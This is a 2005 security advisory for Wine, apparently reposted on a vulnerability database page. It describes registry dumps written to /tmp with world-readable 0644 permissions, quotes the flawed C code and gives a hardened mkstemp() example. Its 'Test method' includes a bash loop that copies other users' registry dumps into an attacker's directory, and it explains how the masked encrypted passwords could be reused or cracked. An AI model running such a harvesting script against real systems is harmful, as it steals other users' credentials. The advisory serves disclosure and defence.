Affected systems:
Wine Windows API Emulator 20050310
Wine Windows API Emulator 20050305
Wine Windows API Emulator 20050211

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 12791

Wine is free software that lets DOS and MS Windows programs (Windows 3.x and Win32 executables) run on UNIX operating systems such as Linux.

When Wine starts a Win32 application it temporarily stores the Windows registry in /tmp under the file name regxxxxyyyy.tmp, where the xxxx part is the hexadecimal pid of the current Wine process and yyyy is an integer that is usually 0.

regxxxxyyyy.tmp is created with 0644 (-rw-r--r--) permissions, which is a security vulnerability in multi-user environments: any local user can read this dump of the Windows registry and obtain sensitive information such as passwords and other confidential data.

The affected functions are _get_tmp_fn(FILE **) in $winerelease/misc/registry.c and save_branch( struct key *key, const char *path ) in $winerelease/server/registry.c.
_get_tmp_fn(FILE **) @ $winerelease/misc/registry.c :
-----------------------------------------------------
static LPSTR _get_tmp_fn(FILE **f)
{
    LPSTR ret;
    int tmp_fd,count;

    ret = _xmalloc(50);
    for (count = 0;;)
    {
        sprintf(ret,"/tmp/reg%lx%04x.tmp",(long)getpid(),count++);
        //here file regxxxyyyy.tmp is not created with secure permissions
        if ((tmp_fd = open(ret,O_CREAT | O_EXCL | O_WRONLY,0666)) != -1) break;
        if (errno != EEXIST)
        {
            ERR("Unexpected error while open() call: %s\n",strerror(errno));
            free(ret);
            *f = NULL;
            return NULL;
        }
    }
------------------------------------------------------
save_branch( struct key *,const char * ) @ $winerelease/server/registry.c:
------------------------------------------------------
static int save_branch( struct key *key, const char *path )
{
    struct stat st;
    char *p, *real, *tmp = NULL;
    int fd, count = 0, ret = 0, by_symlink;
    FILE *f;
    . . .
    for (;;)
    {
        sprintf( p, "reg%lx%04x.tmp", (long) getpid(), count++ );
        //here file regxxxyyyy.tmp is not created with secure permissions
        if ((fd = open( tmp, O_CREAT | O_EXCL | O_WRONLY, 0666 )) != -1) break;
        if (errno != EEXIST) goto done;
        close( fd );
    }
    . . .
}
------------------------------------------------------
When open() creates regxxxyyyy.tmp it is passed mode 0666. Because the default umask is 022, (0666) & ~(022) = 0644 = -rw-r--r--, so the file ends up with 0644 permissions.
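The following is an added example written for this page; it is not Wine code. It shows the umask arithmetic from the paragraph above, reproduces the advisory's open(..., 0666) call on a throwaway file so the resulting mode can be inspected, and places beside it a hardened replacement that creates the dump file owner-only (0600) with mkstemp() so its permissions never depend on the caller's umask. The function names (effective_mode, create_private_tmp, fd_is_owner_only and the two check functions) and the /tmp directory argument are assumptions of the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Effective permission bits of a file created via open(path, O_CREAT, mode):
 * the process umask clears bits, so 0666 under umask 022 becomes 0644. */
mode_t effective_mode(mode_t requested, mode_t umask_bits)
{
    return (requested & ~umask_bits) & 0777;
}

/* Return 1 if the open descriptor carries no group/other permission bits. */
int fd_is_owner_only(int fd)
{
    struct stat st;
    if (fstat(fd, &st) == -1) return 0;
    return (st.st_mode & (S_IRWXG | S_IRWXO)) == 0;
}

/* Hardened replacement for the open() call in _get_tmp_fn()/save_branch()
 * (example, not Wine's fix): mkstemp() creates the file with
 * O_CREAT|O_EXCL|O_RDWR and mode 0600, and its random suffix replaces the
 * predictable pid-based name. path_out receives the final path.
 * Returns the fd, or -1 with errno set. */
int create_private_tmp(const char *dir, char *path_out, size_t path_len)
{
    int n = snprintf(path_out, path_len, "%s/regXXXXXX", dir);
    if (n < 0 || (size_t)n >= path_len) { errno = ENAMETOOLONG; return -1; }
    int fd = mkstemp(path_out);
    if (fd == -1) return -1;
    /* Make the mode explicit: very old libcs created mkstemp() files 0666. */
    if (fchmod(fd, S_IRUSR | S_IWUSR) == -1) {
        int saved = errno;
        close(fd);
        unlink(path_out);
        errno = saved;
        return -1;
    }
    return fd;
}

/* Reproduce the advisory's creation call (mode 0666 under umask 022) and
 * report whether the result is readable by other users. The file is empty
 * and is removed immediately; only its mode is inspected. */
int insecure_open_is_world_readable(const char *dir)
{
    char path[128];
    int fd = -1, count = 0, readable = 0;
    mode_t old = umask(022);
    for (;;) {
        snprintf(path, sizeof path, "%s/reg%lx%04x.tmp", dir, (long)getpid(), count++);
        fd = open(path, O_CREAT | O_EXCL | O_WRONLY, 0666);   /* the insecure call */
        if (fd != -1) break;
        if (errno != EEXIST || count > 0xffff) { umask(old); return -1; }
    }
    struct stat st;
    if (fstat(fd, &st) == 0) readable = (st.st_mode & S_IROTH) != 0;
    close(fd);
    unlink(path);
    umask(old);
    return readable;
}

/* Same check for the hardened call: owner-only regardless of the umask. */
int hardened_open_is_owner_only(const char *dir)
{
    char path[128];
    mode_t old = umask(022);
    int fd = create_private_tmp(dir, path, sizeof path);
    umask(old);
    if (fd == -1) return -1;
    int ok = fd_is_owner_only(fd);
    close(fd);
    unlink(path);
    return ok;
}

int main(void)
{
    printf("0666 under umask 022 -> %04o\n", (unsigned)effective_mode(0666, 022));
    printf("insecure open world-readable: %d\n", insecure_open_is_world_readable("/tmp"));
    printf("hardened open owner-only:     %d\n", hardened_open_is_owner_only("/tmp"));
    return 0;
}
```

Using mkstemp() rather than open() with an explicit 0600 also removes the predictable name, which matters because the original loop retries with O_EXCL against a name any local user can compute from the pid. The fchmod() after creation costs nothing and documents the intended mode in the code itself, which is what a reviewer would look for in a patch to these two functions.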
Source: Giovanni Delvecchio (badpenguin79@hotmail.com)
Links:
http://marc.theaimsgroup.com/?l=bugtraq&m=111082537009842&w=2
http://bugs.winehq.org/show_bug.cgi?id=2715
http://www.zone-h.org/advisories/read/id=7300
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Users assume all risk!
To exploit this vulnerability, a local attacker can use a bash script that checks whether regxxxyyyy.tmp exists in /tmp and, if it does, copies it to a local directory for analysis.
Example bash script:
----------------------------------------------
#!/bin/sh
count=1
while [ true ]; do
    if [ -f /tmp/reg*.tmp ]; then
        cp /tmp/reg* /home/attacker/reg$count
        count=$(($count + 1))
        sleep 1
    fi
done
---------------------------------------------
In testing, this script obtained sensitive information such as:
--------------------------------------------------------------------------------
[Software\\Microsoft\\Protected Storage System Provider\\*Default*\\Data\\b9819c52-1e12-4bbd-91e7-af9afea5b02d\\87f5aab7-ca62-41c5-8896-27714d7b7e73\\MARSUSERPROTECTEDINFO]
"Behavior"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx
"Item Data"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx
--------------------------------------------------------------------------------
[Software\\Microsoft\\Protected Storage System Provider\\*Default*\\Data\\220d5cc1-853a-11d0-84bc-00c04fd43f8f\\417e2d75-84bd-11d0-84bb-00c04fd43f8f\\HotmailCC990760]
"Behavior"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx
"Item Data"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx
--------------------------------------------------------------------------------
and:
--------------------------------------------------------------------------------
[Software\\Microsoft\\Internet Account Manager\\Accounts\\00000008]
"Account Name"="libero.it"
"Connection Type"=dword:00000003
"POP3 Server"="pop3.libero.it"
"POP3 User Name"="xxxxxxx"
"POP3 Password2"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx
"POP3 Prompt for Password"=dword:00000000
"SMTP Server"="mail.libero.it"
"SMTP Display Name"="xxxxxx"
"SMTP Email Address"="xxxxxx@libero.it"
"POP3 Skip Account"=dword:00000000
"POP3 Port"=dword:0000006e
"SMTP User Name"=""
"SMTP Password2"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
  xx,xx,xx,xx,xx,xx,xx,xx,xx,xx
"SMTP Use Sicily"=dword:00000000
"SMTP Prompt for Password"=dword:00000000
--------------------------------------------------------------------------------
These are the encrypted passwords of MSN Explorer and Outlook.
Note that even though the passwords are encrypted, an attacker can import them into a Windows registry and thereby gain unauthorized access to the victim's accounts, or use tools available online to crack the encrypted passwords.
Original author: Anonymous | Entry time: 2007-1-2 22:29:43 | Source: Unknown